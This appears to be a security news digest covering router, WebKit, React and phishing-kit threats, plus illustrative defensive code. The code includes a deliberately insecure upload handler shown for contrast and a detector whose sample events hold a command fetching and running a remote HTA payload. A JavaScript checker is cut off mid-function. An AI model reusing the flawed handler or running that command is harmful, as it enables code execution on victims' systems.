2025-12-15 AI Startup News
CISA Adds Actively Exploited Sierra Wireless Router Flaw Enabling RCE Attacks
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a high-severity flaw impacting Sierra Wireless AirLink ALEOS routers to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild. CVE-2018-4063 (CVSS score: 8.8/9.9) refers to an unrestricted file upload vulnerability that could be exploited to achieve remote code execution by means of a malicious HTTP request. “A specially crafted HTTP request can upload a file, resulting in executable code being uploaded, and routable, to the webserver,” the agency said.
“An attacker can make an authenticated HTTP request to trigger this vulnerability.” Details of the six-year-old flaw were publicly shared by Cisco Talos in April 2019, describing it as an exploitable remote code execution vulnerability in the ACEManager “upload.cgi” function of Sierra Wireless AirLink ES450 firmware version 4.9.3. Talos reported the flaw to the Canadian company in December 2018. “This vulnerability exists in the file upload capability of templates within the AirLink 450,” the company said. “When uploading template files, you can specify the name of the file that you are uploading.” “There are no restrictions in place that protect the files that are currently on the device, used for normal operation.
If a file is uploaded with the same name of the file that already exists in the directory, then we inherit the permissions of that file.” Talos noted that some of the files that exist in the directory (e.g., “fw_upload_init.cgi” or “fw_status.cgi”) have executable permissions on the device, meaning an attacker can send HTTP requests to the “/cgi-bin/upload.cgi” endpoint to upload a file with the same name to achieve code execution. This is compounded by the fact that ACEManager runs as root, thereby causing any shell script or executable uploaded to the device to also run with elevated privileges.
The addition of CVE-2018-4063 to the KEV catalog comes a day after a honeypot analysis conducted by Forescout over a 90-day period revealed that industrial routers are the most attacked devices in operational technology (OT) environments, with threat actors attempting to deliver botnet and cryptocurrency miner malware families like RondoDox, Redtail, and ShadowV2 by exploiting the following flaws -
- CVE-2024-12856 (Four-Faith routers)
- CVE-2024-0012, CVE-2024-9474, and CVE-2025-0108 (Palo Alto Networks PAN-OS)
Attacks have also been recorded from a previously undocumented threat cluster named Chaya_005 that weaponized CVE-2018-4063 in early January 2024 to upload an unspecified malicious payload with the name “fw_upload_init.cgi.” No further successful exploitation efforts have been detected since then.
“Chaya_005 appears to be a broader reconnaissance campaign testing multiple vendor vulnerabilities rather than focusing on a single one,” Forescout Research – Vedere Labs said, adding it’s likely the cluster is no longer a “significant threat.” In light of active exploitation of CVE-2018-4063, Federal Civilian Executive Branch (FCEB) agencies are advised to update their devices to a supported version or discontinue the use of the product by January 2, 2026, since it has reached end-of-support status.
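The permission inheritance Talos describes for “upload.cgi”, as an added example that is not Sierra Wireless or Talos code: a handler that overwrites an existing file in place keeps that file's executable bit, while a hardened handler refuses name collisions and creates files with fixed, non-executable permissions. The function names, the temporary directory and the “.xml” template extension are assumptions made for the illustration.

```python
import os
import stat
import tempfile

# Assumption for this illustration: templates are data files with this extension.
ALLOWED_EXTENSIONS = {".xml"}


class UploadRejected(Exception):
    """Raised when an upload violates the storage policy."""


def naive_save(upload_dir, client_name, data):
    """Flawed pattern: trust the client-supplied name and overwrite in place.

    Opening an existing file for writing truncates it but keeps its mode bits,
    so content written over an executable CGI script remains executable.
    """
    path = os.path.join(upload_dir, client_name)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def hardened_save(upload_dir, client_name, data):
    """Accept only new, non-executable data files with a bare, allowed name."""
    if (not client_name or client_name in (".", "..")
            or any(ch in client_name for ch in "/\\\x00")):
        raise UploadRejected("file name must be a bare name without path parts")
    if os.path.splitext(client_name)[1].lower() not in ALLOWED_EXTENSIONS:
        raise UploadRejected("file type is not an allowed template type")
    path = os.path.join(upload_dir, client_name)
    # O_EXCL makes creation fail if anything (file or symlink) already has this
    # name, so an upload can never replace a file the device depends on.
    try:
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    except FileExistsError:
        raise UploadRejected("a file with this name already exists") from None
    with os.fdopen(fd, "wb") as fh:
        # Fix the mode explicitly: no execute bits, independent of the umask.
        os.fchmod(fh.fileno(), 0o600)
        fh.write(data)
    return path


def _mode(path):
    """Return the permission bits of a file as an octal string."""
    return "%o" % stat.S_IMODE(os.stat(path).st_mode)


def _try(upload_dir, name):
    """Run the hardened handler and describe the outcome as text."""
    try:
        return "stored with mode " + _mode(hardened_save(upload_dir, name, b"<template/>\n"))
    except UploadRejected as exc:
        return "rejected: %s" % exc


def demo():
    """Run both handlers in a constructed directory holding an executable CGI file."""
    out = {}
    with tempfile.TemporaryDirectory() as d:
        cgi = os.path.join(d, "fw_status.cgi")  # file name taken from the article
        with open(cgi, "wb") as fh:
            fh.write(b"#!/bin/sh\necho status\n")
        os.chmod(cgi, 0o755)

        naive_save(d, "fw_status.cgi", b"replaced\n")
        with open(cgi, "rb") as fh:
            out["naive_replaced_content"] = fh.read() == b"replaced\n"
        out["naive_mode_after_overwrite"] = _mode(cgi)

        out["hardened_cgi_name"] = _try(d, "fw_status.cgi")
        out["hardened_new_template"] = _try(d, "site-a.xml")
        out["hardened_duplicate"] = _try(d, "site-a.xml")
        out["hardened_traversal"] = _try(d, "../other.xml")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```
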
Apple Issues Security Updates After Two WebKit Flaws Found Exploited in the Wild
Apple on Friday released security updates for iOS, iPadOS, macOS, tvOS, watchOS, visionOS, and its Safari web browser to address two security flaws that it said have been exploited in the wild, one of which is the same flaw that was patched by Google in Chrome earlier this week. The vulnerabilities are listed below -
- CVE-2025-43529 (CVSS score: N/A) - A use-after-free vulnerability in WebKit that may lead to arbitrary code execution when processing maliciously crafted web content
- CVE-2025-14174 (CVSS score: 8.8) - A memory corruption issue in WebKit that may lead to memory corruption when processing maliciously crafted web content
Apple said it’s aware that the shortcomings “may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 26.” It’s worth noting that CVE-2025-14174 is the same vulnerability that Google issued patches for in its Chrome browser on December 10, 2025. It’s been described by the tech giant as an out-of-bounds memory access in the company’s open-source Almost Native Graphics Layer Engine (ANGLE) library, specifically in its Metal renderer. Apple Security Engineering and Architecture (SEAR) and Google Threat Analysis Group (TAG) have been credited with discovering and reporting the flaw, while Apple credited TAG with finding CVE-2025-43529.
This indicates that the vulnerabilities were likely weaponized in highly-targeted mercenary spyware attacks, given that they both affect WebKit, the rendering engine that’s also used in all third-party web browsers on iOS and iPadOS, including Chrome, Microsoft Edge, Mozilla Firefox, and others. The flaws have been addressed in the following versions and devices -
- iOS 26.2 and iPadOS 26.2 - iPhone 11 and later, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 8th generation and later, and iPad mini 5th generation and later
- iOS 18.7.3 and iPadOS 18.7.3 - iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later
- macOS Tahoe 26.2 - Macs running macOS Tahoe
- tvOS 26.2 - Apple TV HD and Apple TV 4K (all models)
- watchOS 26.2 - Apple Watch Series 6 and later
- visionOS 26.2 - Apple Vision Pro (all models)
- Safari 26.2 - Macs running macOS Sonoma and macOS Sequoia
With these updates, Apple has now patched nine zero-day vulnerabilities that were exploited in the wild in 2025, including CVE-2025-24085, CVE-2025-24200, CVE-2025-24201, CVE-2025-31200, CVE-2025-31201, CVE-2025-43200, and CVE-2025-43300.
Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads
Cybersecurity researchers are calling attention to a new campaign that’s leveraging GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) dubbed PyStoreRAT. “These repositories, often themed as development utilities or OSINT tools, contain only a few lines of code responsible for silently downloading a remote HTA file and executing it via ‘mshta.exe,’” Morphisec researcher Yonatan Edri said in a report shared with The Hacker News. PyStoreRAT has been described as a “modular, multi-stage” implant that can execute EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer known as Rhadamanthys as a follow-on payload.
Attack chains involve distributing the malware through Python or JavaScript loader stubs embedded in GitHub repositories masquerading as OSINT tools, DeFi bots, GPT wrappers, and security-themed utilities that are designed to appeal to analysts and developers. The earliest signs of the campaign go back to mid-June 2025, with a steady stream of “repositories” published since then. The tools are promoted via social media platforms like YouTube and X, and the repositories’ star and fork metrics are artificially inflated – a technique reminiscent of the Stargazers Ghost Network. The threat actors behind the campaign leverage either newly created GitHub accounts or those that lay dormant for months to publish the repositories, stealthily slipping the malicious payload in the form of “maintenance” commits in October and November after the tools began to gain popularity and landed on GitHub’s top trending lists.
In fact, many of the tools did not function as they were advertised, only displaying static menus or non-interactive interfaces in some cases, while others performed minimal placeholder operations. The intention behind the operation was to lend them a veneer of legitimacy by abusing GitHub’s inherent trust and deceiving users into executing the loader stub that’s responsible for initiating the infection chain. This effectively triggers the execution of a remote HTML Application (HTA) payload that, in turn, delivers the PyStoreRAT malware, which comes with capabilities to profile the system, check for administrator privileges, and scan the system for cryptocurrency wallet-related files, specifically those associated with Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02. The loader stub gathers a list of installed antivirus products and checks for strings matching “Falcon” (a reference to CrowdStrike Falcon) or “Reason” (a reference to Cybereason or ReasonLabs), likely in an attempt to reduce visibility.
In the event they are detected, it launches “mshta.exe” by means of “cmd.exe.” Otherwise, it proceeds with direct “mshta.exe” execution. Persistence is achieved by setting up a scheduled task that’s disguised as an NVIDIA app self-update. In the final stage, the malware contacts an external server to fetch commands to be executed on the host. Some of the supported commands are listed below -
- Download and execute EXE payloads, including Rhadamanthys
- Download and extract ZIP archives
- Download a malicious DLL and execute it using “rundll32.exe”
- Fetch raw JavaScript code and execute it dynamically in memory using eval()
- Download and install MSI packages
- Spawn a secondary “mshta.exe” process to load additional remote HTA payloads
- Execute PowerShell commands directly in memory
- Spread via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files
- Delete the scheduled task to remove the forensic trail
It’s currently not known who is behind the operation, but the presence of Russian-language artifacts and coding patterns alludes to a threat actor of likely Eastern European origin, Morphisec said.
“PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” Edri concluded. “Its use of HTA/JS for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional EDR solutions detect only late in the infection chain.” The disclosure comes as Chinese security vendor QiAnXin detailed another new remote access trojan (RAT) codenamed SetcodeRat that’s likely being propagated across the country since October 2025 via malvertising lures. Hundreds of computers, including those belonging to governments and enterprises, are said to have been infected in a span of one month. “The malicious installation package will first verify the region of the victim,” the QiAnXin Threat Intelligence Center said.
“If it is not in the Chinese-speaking area, it will automatically exit.” The malware is disguised as legitimate installers for popular programs like Google Chrome and proceeds to the next stage only if the system language corresponds to Mainland China (Zh-CN), Hong Kong (Zh-HK), Macao (Zh-MO), and Taiwan (Zh-TW). It also terminates the execution if a connection to a Bilibili URL (“api.bilibili[.]com/x/report/click/now”) is unsuccessful. In the next stage, an executable named “pnm2png.exe” is launched to sideload “zlib1.dll,” which then decrypts the contents of a file called “qt.conf” and runs it. The decrypted payload is a DLL that embeds the RAT payload.
SetcodeRat can either connect to Telegram or a conventional command-and-control (C2) server to retrieve instructions and carry out data theft. It enables the malware to take screenshots, log keystrokes, read folders, set folders, start processes, run “cmd.exe,” set socket connections, collect system and network connection information, and update itself to a new version.
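A detection sketch for the PyStoreRAT loader behaviour described above (a script interpreter starting “mshta.exe” against a remote HTA, either directly or through “cmd.exe”), added here as an example and not taken from Morphisec's report. The event fields, the interpreter list and every sample event are constructed for the illustration.

```python
import re
from dataclasses import dataclass

# Assumed interpreter names that could host a Python or JavaScript loader stub.
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "py.exe", "node.exe"}
# Intermediate shells the loader may insert between itself and mshta.exe.
SHELL_WRAPPERS = {"cmd.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
MAX_DEPTH = 4  # how many ancestors to inspect


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (field names are assumptions)."""
    pid: int
    ppid: int
    image: str
    command_line: str


def image_name(path):
    """Lower-cased executable name from a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_remote_hta_launches(events):
    """Flag mshta.exe started with a remote URL by a script interpreter.

    Ancestors are followed through cmd.exe only, so both the direct launch and
    the cmd.exe-wrapped launch match. Real telemetry should key on a process
    GUID rather than the PID, because PIDs are reused.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for event in events:
        if image_name(event.image) != "mshta.exe":
            continue
        url = REMOTE_URL.search(event.command_line)
        if url is None:
            continue  # local .hta files are out of scope for this rule
        chain = ["mshta.exe"]
        current, origin = event, None
        for _ in range(MAX_DEPTH):
            parent = by_pid.get(current.ppid)
            if parent is None:
                break
            name = image_name(parent.image)
            chain.append(name)
            if name in SCRIPT_HOSTS:
                origin = name
                break
            if name not in SHELL_WRAPPERS:
                break
            current = parent
        if origin is not None:
            findings.append({
                "pid": event.pid,
                "url": url.group(0),
                "chain": " > ".join(reversed(chain)),
                "via_cmd": "cmd.exe" in chain,
            })
    return findings


# Constructed sample events; hosts under example.invalid are placeholders.
SAMPLE_EVENTS = [
    ProcessEvent(100, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(200, 100, r"C:\Python312\python.exe", "python.exe osint_tool.py"),
    ProcessEvent(300, 200, r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://cdn.example.invalid/update.hta"),
    ProcessEvent(400, 100, r"C:\Python312\python.exe", "python.exe gpt_wrapper.py"),
    ProcessEvent(410, 400, r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c mshta.exe https://cdn.example.invalid/update.hta"),
    ProcessEvent(420, 410, r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://cdn.example.invalid/update.hta"),
    ProcessEvent(500, 100, r"C:\Windows\System32\mshta.exe",
                 r'mshta.exe "C:\Program Files\Vendor\help.hta"'),
    ProcessEvent(600, 100, r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://intranet.example.invalid/form.hta"),
]

if __name__ == "__main__":
    for finding in find_remote_hta_launches(SAMPLE_EVENTS):
        print(finding)
```
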
New Advanced Phishing Kits Use AI and MFA Bypass Tactics to Steal Credentials at Scale
Cybersecurity researchers have documented four new phishing kits named BlackForce, GhostFrame, InboxPrime AI, and Spiderman that are capable of facilitating credential theft at scale. BlackForce, first detected in August 2025, is designed to steal credentials and perform Man-in-the-Browser (MitB) attacks to capture one-time passwords (OTPs) and bypass multi-factor authentication (MFA). The kit is sold on Telegram forums for anywhere between €200 ($234) and €300 ($351). The kit, according to Zscaler ThreatLabz researchers Gladis Brinda R and Ashwathi Sasi, has been used to impersonate over 11 brands, including Disney, Netflix, DHL, and UPS.
It’s said to be in active development. “BlackForce features several evasion techniques with a blocklist that filters out security vendors, web crawlers, and scanners,” the company said. “BlackForce remains under active development. Version 3 was widely used until early August, with versions 4 and 5 being released in subsequent months.” Phishing pages connected to the kit have been found to use JavaScript files with what has been described as “cache busting” hashes in their names (e.g., “index-[hash].js”), thereby forcing the victim’s web browser to download the latest version of the malicious script instead of using a cached version.
In a typical attack using the kit, victims who click on a link are redirected to a malicious phishing page, after which a server-side check filters out crawlers and bots, before serving them a page that’s designed to mimic a legitimate website. Once the credentials are entered on the page, the details are captured and sent to a Telegram bot and a command-and-control (C2) panel in real-time using an HTTP client called Axios. When the attacker attempts to log in with the stolen credentials on the legitimate website, an MFA prompt is triggered. At this stage, the MitB techniques are used to display a fake MFA authentication page to the victim’s browser through the C2 panel.
Should the victim enter the MFA code on the bogus page, it’s collected and used by the threat actor to gain unauthorized access to their account. “Once the attack is complete, the victim is redirected to the homepage of the legitimate website, hiding evidence of the compromise and ensuring the victim remains unaware of the attack,” Zscaler said.
GhostFrame Fuels 1M+ Stealth Phishing Attacks
Another nascent phishing kit that has gained traction since its discovery in September 2025 is GhostFrame. At the heart of the kit’s architecture is a simple HTML file that appears harmless while hiding its malicious behavior within an embedded iframe, which leads victims to a phishing login page to steal Microsoft 365 or Google account credentials.
“The iframe design also allows attackers to easily switch out the phishing content, try new tricks or target specific regions, all without changing the main web page that distributes the kit,” Barracuda security researcher Sreyas Shetty said. “Further, by simply updating where the iframe points, the kit can avoid being detected by security tools that only check the outer page.” Attacks using the GhostFrame kit commence with typical phishing emails that claim to be about business contracts, invoices, and password reset requests, but are designed to take recipients to the fake page. The kit uses anti-analysis and anti-debugging to prevent attempts to inspect it using browser developer tools, and generates a random subdomain each time someone visits the site. The visible outer pages come with a loader script that’s responsible for setting up the iframe and responding to any messages from the HTML element.
This can include changing the parent page’s title to impersonate trusted services, modifying the site favicon, or redirecting the top-level browser window to another domain. In the final stage, the victim is sent to a secondary page containing the actual phishing components through the iframe delivered via the constantly changing subdomain, thereby making it harder to block the threat. The kit also incorporates a fallback mechanism in the form of a backup iframe appended at the bottom of the page in the event the loader JavaScript fails or is blocked.
InboxPrime AI Phishing Kit Automates Email Attacks
If BlackForce follows the same playbook as other traditional phishing kits, InboxPrime AI goes a step further by leveraging artificial intelligence (AI) to automate mass mailing campaigns.
It’s advertised on a 1,300-member-strong Telegram channel under a malware-as-a-service (MaaS) subscription model for $1,000, granting purchasers a perpetual license and full access to the source code. “It is designed to mimic real human emailing behavior and even leverages Gmail’s web interface to evade traditional filtering mechanisms,” Abnormal researchers Callie Baron and Piotr Wojtyla said. “InboxPrime AI blends artificial intelligence with operational evasion techniques and promises cybercriminals near-perfect deliverability, automated campaign generation, and a polished, professional interface that mirrors legitimate email marketing software.” The platform employs a user-friendly interface that allows customers to manage accounts, proxies, templates, and campaigns, mirroring commercial email automation tools. One of its core features is a built-in AI-powered email generator, which can produce entire phishing emails, including the subject lines, in a manner that mimics legitimate business communication.
In doing so, these services further lower the barrier to entry for cybercrime, effectively eliminating the manual work that goes into drafting such emails. In its place, attackers can configure parameters, such as language, topic, or industry, email length, and desired tone, which the toolkit uses as inputs to generate convincing lures that match the chosen theme. What’s more, the dashboard enables users to save the produced email as a reusable template, complete with support for spintax to create variations of the email messages by substituting certain template variables. This ensures that no two phishing emails look identical and helps them bypass signature-based filters that look for similar content patterns.
Some of the other supported features in InboxPrime AI are listed below -
- A real-time spam diagnostic module that can analyze a generated email for common spam-filter triggers and suggest precise corrections
- Sender identity randomization and spoofing, enabling attackers to customize display names for each Gmail session
“This industrialization of phishing has direct implications for defenders: more attackers can now launch more campaigns with more volume, without any corresponding increase in defender bandwidth or resources,” Abnormal said. “This not only accelerates campaign launch time but also ensures consistent message quality, enables scalable, thematic targeting across industries, and empowers attackers to run professional-looking phishing operations without copywriting expertise.”
Spiderman Creates Pixel-Perfect Replicas of European Banks
The third phishing kit that has come under the cybersecurity radar is Spiderman, which permits attackers to target customers of dozens of European banks and online financial services providers, such as Blau, CaixaBank, Comdirect, Commerzbank, Deutsche Bank, ING, O2, Volksbank, Klarna, and PayPal. “Spiderman is a full-stack phishing framework that replicates dozens of European banking login pages, and even some government portals,” Varonis researcher Daniel Kelley said. “Its organized interface provides cybercriminals with an all-in-one platform to launch phishing campaigns, capture credentials, and manage stolen session data in real-time.” What’s notable about the modular kit is that its seller is marketing the solution in a Signal messenger group that has about 750 members, marking a departure from Telegram.
Germany, Austria, Switzerland, and Belgium are the primary targets of the phishing service. Like in the case of BlackForce, Spiderman utilizes various techniques like ISP allowlisting, geofencing, and device filtering to ascertain that only the intended targets can access the phishing pages. The toolkit is also equipped to capture cryptocurrency wallet seed phrases, intercept OTP and PhotoTAN codes, and trigger prompts to gather credit card data. “This flexible, multi-step approach is particularly effective in European banking fraud, where login credentials alone often aren’t enough to authorize transactions,” Kelley explained.
“After capturing credentials, Spiderman logs each session with a unique identifier so the attacker can maintain continuity through the entire phishing workflow.”
Hybrid Salty-Tycoon 2FA Attacks Spotted
BlackForce, GhostFrame, InboxPrime AI, and Spiderman are the latest additions to a long list of phishing kits like Tycoon 2FA, Salty 2FA, Sneaky 2FA, Whisper 2FA, Cephas, and Astaroth (not to be confused with a Windows banking trojan of the same name) that have emerged over the past year. In a report published earlier this month, ANY.RUN said it observed a new Salty-Tycoon hybrid that’s already bypassing detection rules tuned to either of them. The new attack wave coincides with a sharp drop in Salty 2FA activity in late October 2025, with early stages matching Salty 2FA, while later stages load code that reproduces Tycoon 2FA’s execution chain. “This overlap marks a meaningful shift; one that weakens kit-specific rules, complicates attribution, and gives threat actors more room to slip past early detection,” the company said.
“Taken together, this provides clear evidence that a single phishing campaign, and, more interestingly, a single sample, contains traces of both Salty 2FA and Tycoon, with Tycoon serving as a fallback payload once the Salty infrastructure stopped working for reasons that are still unclear.”
Securing GenAI in the Browser: Policy, Isolation, and Data Controls That Actually Work
The browser has become the main interface to GenAI for most enterprises: from web-based LLMs and copilots, to GenAI‑powered extensions and agentic browsers like ChatGPT Atlas. Employees are leveraging the power of GenAI to draft emails, summarize documents, work on code, and analyze data, often by copying/pasting sensitive information directly into prompts or uploading files. Traditional security controls were not designed to understand this new prompt‑driven interaction pattern, leaving a critical blind spot where risk is highest. Security teams are simultaneously under pressure to enable more GenAI platforms because they clearly boost productivity.
Simply blocking AI is unrealistic. The more sustainable approach is to secure GenAI platforms where they are accessed by users: inside the browser session.
The GenAI browser threat model
The GenAI‑in‑the‑browser threat model must be approached differently from traditional web browsing due to several key factors. Users routinely paste entire documents, code, customer records, or sensitive financial information into prompt windows.
This can lead to data exposure or long‑term retention in the LLM system. File uploads create similar risks when documents are processed outside of approved data‑handling pipelines or regional boundaries, putting organizations in jeopardy of violating regulations. GenAI browser extensions and assistants often require broad permissions to read and modify page content. This includes data from internal web apps that users never intended to share with external services.
Mixed use of personal and corporate accounts in the same browser profile complicates attribution and governance. All of these behaviors put together create a risk surface that is invisible to many legacy controls.
Policy: defining safe use in the browser
A workable GenAI security strategy in the browser starts with a clear, enforceable policy that defines what “safe use” means. CISOs should categorize GenAI tools into sanctioned services and allow/disallow public tools and applications with different risk treatments and monitoring levels.
After setting clear boundaries, enterprises can then align browser‑level enforcement so that the user experience matches the policy intent. A strong policy consists of specifications around which data types are never allowed in GenAI prompts or uploads. Common restricted categories can include regulated personal data, financial details, legal information, trade secrets, and source code. The policy language should also be concrete and consistently enforced by technical controls rather than relying on user judgment.
Behavioral guardrails that users can live with
Beyond allowing or disallowing applications, enterprises need guardrails that define how employees should access and use GenAI in the browser. Requiring single sign‑on and corporate identities for all sanctioned GenAI services can improve visibility and control while reducing the likelihood that data ends up in unmanaged accounts. Exception handling is equally important, as teams such as research or marketing may require more permissive GenAI access. Others, like finance or legal, may need stricter guardrails.
A formal process for requesting policy exceptions, time‑based approvals, and review cycles allows flexibility. These behavioral elements make technical controls more predictable and acceptable to end users.
Isolation: containing risk without harming productivity
Isolation is the second major pillar of securing browser-based GenAI use. Instead of a binary model, organizations can use specific approaches to reduce risk when GenAI is being accessed.
Dedicated browser profiles, for example, create boundaries between sensitive internal apps and GenAI‑heavy workflows. Per‑site and per‑session controls provide another layer of defense. For example, a security team may allow GenAI access to designated “safe” domains while restricting the ability of AI tools and extensions to read content from high‑sensitivity applications like ERP or HR systems. This approach enables employees to continue using GenAI for generic tasks while reducing the likelihood that confidential data is being shared with third‑party tools accessed inside the browser.
Data controls: precision DLP for prompts and pages
Policy defines the intent, and isolation limits exposure. Data controls provide the precise enforcement mechanism at the browser edge. Inspecting user actions like copy/paste, drag‑and‑drop, and file uploads at the point where they leave trusted apps and enter GenAI interfaces is critical. Effective implementations should support multiple enforcement modes: monitor‑only, user warnings, in‑time education, and hard blocks for clearly prohibited data types.
This tiered approach helps reduce user friction while preventing serious leaks.
Managing GenAI browser extensions
GenAI‑powered browser extensions and side panels are a tricky risk category. Many offer convenient features like page summarizations, creating replies, or data extraction. But doing so often requires extensive permissions to read and modify page content, keystrokes, and clipboard data.
Without oversight, these extensions can become an exfiltration channel for sensitive information. CISOs must be aware of the AI‑powered extensions in use at their enterprise, classify them by risk level, and enforce a default‑deny or allowed‑with‑restrictions list. Using a Secure Enterprise Browser (SEB) for continuous monitoring of newly installed or updated extensions helps identify changes in permissions that may introduce new risks over time.
Identity, accounts, and session hygiene
Identity and session handling are central to GenAI browser security because they determine which data belongs to which account.
Enforcing SSO for sanctioned GenAI platforms and tying usage back to enterprise identities will simplify logging and incident response. Browser‑level controls can help prevent cross‑access between work and personal contexts. For example, organizations can block copying content from corporate apps into GenAI applications when the user has not been authenticated into a corporate account.
Visibility, telemetry, and analytics
Ultimately, a working GenAI security program relies on accurate visibility into how employees are using browser-based GenAI tools.
Tracking which domains and apps are accessed, the contents being entered into prompts, and how often policies trigger warnings or blocks are all necessary. Aggregating this telemetry into existing logging and SIEM infrastructure allows security teams to identify patterns, outliers, and incidents. Analytics built on this data can help highlight genuine risk. For example, enterprises can make a clear determination between non‑sensitive vs proprietary source code being entered into prompts.
Using this information, SOC teams can refine rules, adjust isolation levels, and target training where it will provide the greatest impact.
Change management and user education
CISOs with successful GenAI security programs invest in the time to explain the “why” behind restrictions. By sharing concrete scenarios that resonate with different roles, you can reduce the chances of your program failing - developers need examples related to IP, while sales and support staff benefit from stories about customer trust and contract details. Sharing scenario‑based content with relevant parties will reinforce good habits in the right moments.
When employees understand that guardrails are designed to preserve their ability to use GenAI at scale, not hinder them, they are more likely to follow the guidelines. Aligning communications with broader AI governance initiatives helps position browser‑level controls as part of a cohesive strategy rather than an isolated one.
A practical 30‑day rollout approach
Many organizations are looking for a pragmatic path to move from ad‑hoc browser-based GenAI usage to a structured, policy‑driven model. One effective way of doing so is utilizing a Secure Enterprise Browsing (SEB) platform that can provide you with the visibility and reach needed.
With the right SEB you can map the current GenAI tools used within your enterprise, so you can create policy decisions like monitoring‑only or warn‑and‑educate modes for clearly risky behaviors. Over the following weeks, enforcement can be expanded to more users and higher‑risk data types, FAQs, and training. By the end of a 30‑day period, many organizations can formalize their GenAI browser policy, integrate alerts into SOC workflows, and establish a cadence for adjusting controls as usage evolves.
Turning the browser into the GenAI control plane
As GenAI continues to spread across SaaS apps and web pages, the browser remains the central interface through which most employees access them.
The best GenAI protections simply cannot be worked into legacy perimeter controls. Enterprises can achieve the best results by treating the browser as the primary control plane. This approach enables security teams with meaningful ways to reduce data leakage and compliance risk while simultaneously preserving the productivity benefits that make GenAI so powerful. With well‑designed policies, measured isolation strategies, and browser‑native data protections, CISOs can move from reactive blocking to confident, large‑scale enablement of GenAI across their entire workforce.
To learn more about Secure Enterprise Browsers (SEB) and how they can secure GenAI use at your organization, speak to a Seraphic expert. This article is a contributed piece from one of our valued partners.
New React RSC Vulnerabilities Enable DoS and Source Code Exposure
The React team has released fixes for two new types of flaws in React Server Components (RSC) that, if successfully exploited, could result in denial-of-service (DoS) or source code exposure. The team said the issues were found by the security community while attempting to exploit the patches released for CVE-2025-55182 (CVSS score: 10.0), a critical bug in RSC that has since been weaponized in the wild. The three vulnerabilities are listed below -
CVE-2025-55184 (CVSS score: 7.5) - A pre-authentication denial of service vulnerability arising from unsafe deserialization of payloads from HTTP requests to Server Function endpoints, triggering an infinite loop that hangs the server process and may prevent future HTTP requests from being served
CVE-2025-67779 (CVSS score: 7.5) - An incomplete fix for CVE-2025-55184 that has the same impact
CVE-2025-55183 (CVSS score: 5.3) - An information leak vulnerability that may cause a specifically crafted HTTP request sent to a vulnerable Server Function to return the source code of any Server Function
However, successful exploitation of CVE-2025-55183 requires the existence of a Server Function that explicitly or implicitly exposes an argument that has been converted into a string format. The flaws affect the following versions of react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack -
CVE-2025-55184 and CVE-2025-55183 - 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1
CVE-2025-67779 - 19.0.2, 19.1.3 and 19.2.2
Security researchers RyotaK and Shinsaku Nomura have been credited with reporting the two DoS bugs to the Meta Bug Bounty program, while Andrew MacPherson has been acknowledged for reporting the information leak flaw.
Users are advised to update to versions 19.0.3, 19.1.4, and 19.2.3 as soon as possible, particularly in light of active exploitation of CVE-2025-55182. “When a critical vulnerability is disclosed, researchers scrutinize adjacent code paths looking for variant exploit techniques to test whether the initial mitigation can be bypassed,” the React team said. “This pattern shows up across the industry, not just in JavaScript. Additional disclosures can be frustrating, but they are generally a sign of a healthy response cycle.”
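As an added example (not code from the React team or from this article), the Node.js check below walks a parsed package-lock.json and classifies every installed copy of the three packages against the version lists quoted above, including copies nested under another dependency. The sample lockfile and all helper names are constructed for illustration.

```javascript
// Added example. The version lists are copied from the advisory text above;
// SAMPLE_LOCK and every helper name here are constructed for illustration.
const RSC_PACKAGES = [
  "react-server-dom-parcel",
  "react-server-dom-turbopack",
  "react-server-dom-webpack",
];

const LISTED_55184_55183 = ["19.0.0", "19.0.1", "19.1.0", "19.1.1", "19.1.2", "19.2.0", "19.2.1"];
const AFFECTED = {
  "CVE-2025-55184": LISTED_55184_55183,
  "CVE-2025-55183": LISTED_55184_55183,
  "CVE-2025-67779": ["19.0.2", "19.1.3", "19.2.2"],
};

// Fixed release for each 19.x line, as stated in the article.
const FIXED_BY_LINE = { "19.0": "19.0.3", "19.1": "19.1.4", "19.2": "19.2.3" };

// "node_modules/a/node_modules/b" -> "b"; workspace paths without node_modules -> null.
function nameFromLockPath(lockPath) {
  const marker = "node_modules/";
  const idx = lockPath.lastIndexOf(marker);
  return idx === -1 ? null : lockPath.slice(idx + marker.length);
}

// Yield every installed copy from a lockfile. Supports the flat "packages" map
// (lockfileVersion 2 and 3) and the nested "dependencies" tree (lockfileVersion 1).
function* installedCopies(lock) {
  if (lock.packages) {
    for (const [lockPath, meta] of Object.entries(lock.packages)) {
      const name = nameFromLockPath(lockPath);
      if (name) yield { where: lockPath, name, version: String(meta.version ?? "") };
    }
    return;
  }
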